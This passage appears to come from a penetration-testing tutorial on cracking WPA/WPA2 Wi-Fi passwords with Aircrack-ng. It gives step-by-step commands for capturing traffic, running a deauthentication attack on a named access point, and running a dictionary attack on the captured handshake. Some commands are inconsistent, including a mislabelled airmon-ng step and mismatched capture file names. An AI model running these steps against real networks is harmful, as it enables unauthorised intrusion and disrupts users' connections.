Let’s see how we can use Aircrack-ng to crack a WPA/WPA2 network:
Step 2—Next, we would listen on the mon0 interfaces for other access points having encryption set to either wpa or wpa2. We would use the “airmon-ng mon0” command to do it.
Our target AP would be Shaxter, which uses WPA as their encryption type. We will take a note of its BSSID and the channel that it’s on, this information would be useful in the upcoming steps. BSSID:
Step 3—Next, we need to save the data associated with our access point to a specific file. The inputs we need to specify are the channel, the bssid, and the file name to write.
Command: airodump-ng –c 1 –w rwap –bssid F4:3E:61:92:68:D7 mon0
◾ –w—File to write ◾ –c—Channel
Capturing the Four-Way Handshake Step 4—In order to successfully crack WAP, we would need to capture the four-way handshake. As mentioned, to achieve this we could use a deauthentication attack to force clients to disconnect and reconnect with the access point. Structure
aireplay-ng –deauth 10 –a ≤Target AP≥ –c ≤Mac address of Mon0≥mon0 Command: aireplay-ng –deauth 10 –a F4:3E:61:92:68:D7 –c 94:39:E5:EA:85:31 mon0
After we have successfully performed a deauthentication attack, we will be able to capture the four-way handshake. Cracking WPA/WAP2 Now that we have all the inputs required for cracking the WPA/WPA PSK, we will use aircrackng and specify a wordlist that would be used against the rhawap.cap file that was generated earlier. Remember that in order for us to successfully crack the WPA/WPA2 PSK, we need to make sure that our file contains the four-way handshake. Structure
aircrack-ng –w Wordlist ‘capture_file’.cap Command: aircrack-ng rhawap.cap –w/pentest/passwords/wordlists/darkc0de.lst
So, now this will start the dictionary attack against the rhawap.cap file, and if the key is found in the dictionary, it will reveal it to us.